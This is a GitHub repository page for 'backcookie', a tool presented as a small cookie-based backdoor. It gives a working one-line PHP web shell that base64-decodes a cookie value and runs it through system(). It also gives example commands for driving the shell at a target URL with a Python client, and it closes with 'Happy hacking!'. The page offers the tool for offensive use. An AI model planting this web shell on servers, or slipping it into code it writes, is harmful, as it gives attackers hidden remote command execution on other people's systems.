Skip to content

natzDev/backcookie

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

44 Commits
 
 
 
 

Repository files navigation

backcookie

Total views

Small backdoor using cookie.

==========

<?php error_reporting(0); system(base64_decode($_COOKIE["yourcookie"])); ?>
Example one: python backcookie.py -u http://target.com/shell.php -c name_cookie
Example two: python backcookie.py --url http://target.com/shell.php --cookie name_cookie

Custom command (binfo), You get objective information

@pwned:~$ binfo

Happy hacking!


Copyright, 2013 by Jose Pino


About

Small backdoor using cookie.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors

Languages

  • Python 100.0%